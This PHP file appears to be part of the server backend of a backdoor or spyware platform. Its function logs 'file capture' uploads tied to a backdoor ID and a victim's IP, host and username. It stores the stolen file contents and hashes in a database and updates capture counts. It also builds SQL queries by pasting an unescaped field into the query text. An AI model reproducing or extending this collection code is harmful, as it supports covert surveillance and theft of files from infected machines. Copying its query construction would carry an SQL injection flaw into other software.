<?php

//////////
///
///   log_filecap.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log_filecap.add'] = array('func'   => 'log_filecap_add',
                               'perm'   => AL_SERV,
                               'escape' => false);



/***************\
*   FUNCTIONS   *
\***************/

function log_filecap_add($backdoor_id, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= desc
   // varchar2  <= [md5(content(contentfile))]
   // varchar3  <= -
   // varchar4  <= -
   // int1      <= [sizeof(content(contentfile))]
   // int2      <= -
   // int3      <= -
   // longtext1 <= -
   // longblob1 <= [content(contentfile)]

   if(!is_success(($ret = db_escape($backdoor_id)))) return $ret;
   if(!is_success(($ret = db_escape($remoteip)))) return $ret;
   if(!is_success(($ret = db_escape($remotehost)))) return $ret;
   if(!is_success(($ret = db_escape($remoteuser)))) return $ret;

   $sql  = "INSERT INTO `log` (`backdoor_id`, ";
   $sql .=                    "`type`, ";
   $sql .=                    "`flags`, ";
   $sql .=                    "`remoteip`, ";
   $sql .=                    "`remotehost`, ";
   $sql .=                    "`remoteuser`, ";
   $sql .=                    "`received`, ";
   $sql .=                    "`acquired`, ";
   $sql .=                    "`varchar1`, ";
   $sql .=                    "`varchar2`, ";
   $sql .=                    "`varchar3`, ";
   $sql .=                    "`int1`, ";
   $sql .=                    "`longblob1`) ";
   $sql .= "VALUES ('$backdoor_id', 'FILECAP', ?, '$remoteip', '$remotehost', '$remoteuser', UTC_TIMESTAMP(), ?, ?, ?, ?, ?, ?)";

   $ret = db_prepare($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $stmt = $ret['payload'];

   foreach($logarray as $log) {
      clearstatcache();

      if(!(isset($log['contentfile']) && isset($_SESSION['upload'][$log['contentfile']]))) {
         return error('session', 'nosuchupload');
      }

      do {
         $md5hash = md5_file(sys_get_temp_dir().'/'.$log['contentfile']);
         $sha1hash = $log['desc'];

         $sql  = "SELECT `log_id` ";
         $sql .= "FROM `log` ";
         $sql .= "WHERE (`backdoor_id` = '$backdoor_id') AND ";
         $sql .=       "(`type` = 'FILECAP') AND ";
         $sql .=       "(`remotehost` = '$remotehost') AND ";
         $sql .=       "(`remoteuser` = '$remoteuser') AND ";
         $sql .=       "(`varchar3` = '".$sha1hash."') AND ";
         $sql .=       "(`varchar2` = '$md5hash')";

         $ret = db_query($sql);

         if(!is_success($ret)) {
            break;
         } else if($ret['payload'] === false) {
            $sql  = "SELECT `varchar2` AS `filename` ";
            $sql .= "FROM `log` ";
            $sql .= "WHERE (`backdoor_id` = '$backdoor_id') AND ";
            $sql .=       "(`type` = 'FILEOPEN') AND ";
            $sql .=       "(`remotehost` = '$remotehost') AND ";
            $sql .=       "(`remoteuser` = '$remoteuser') AND ";
            $sql .=       "(`varchar3` = '".$sha1hash."')";

            $ret = db_query($sql);

            if(!is_success($ret)) {
               break;
            } else if($ret['payload'] !== false) {
               if($ret['payload'][0]->filename) {
                  $log['desc'] = $ret['payload'][0]->filename;
               }
            }

            $params = array(array('t' => 'i', 'v' => $log['flags']),
                            array('t' => 's', 'v' => str_replace(':', '', $log['acquired']->scalar)),
                            array('t' => 's', 'v' => $log['desc']),
                            array('t' => 's', 'v' => $md5hash),
                            array('t' => 's', 'v' => $sha1hash),
                            array('t' => 'i', 'v' => filesize(sys_get_temp_dir().'/'.$log['contentfile'])),
                            array('t' => 'b', 'v' => sys_get_temp_dir().'/'.$log['contentfile']));

            $ret = db_execute($stmt, $params);

            if(!is_success($ret)) {
               break;
            }

            $sql  = "UPDATE `stat` ";
            $sql .= "SET `filecap` = `filecap` + 1, ";
            $sql .=     "`filecap_new` = `filecap_new` + 1 ";
            $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

            $ret = db_query($sql);
         } else {
            $sql  = "UPDATE `log` ";
            $sql .= "SET `received` = UTC_TIMESTAMP() ";
            $sql .= "WHERE `log_id` = '".$ret['payload'][0]->log_id."'";

            $ret = db_query($sql);
         }
      } while(0);

      unlink(sys_get_temp_dir().'/'.$log['contentfile']);
      unset($_SESSION['upload'][$log['contentfile']]);

      if(!is_success($ret)) {
         return $ret;
      }
   }

   return success(true);
}

?>
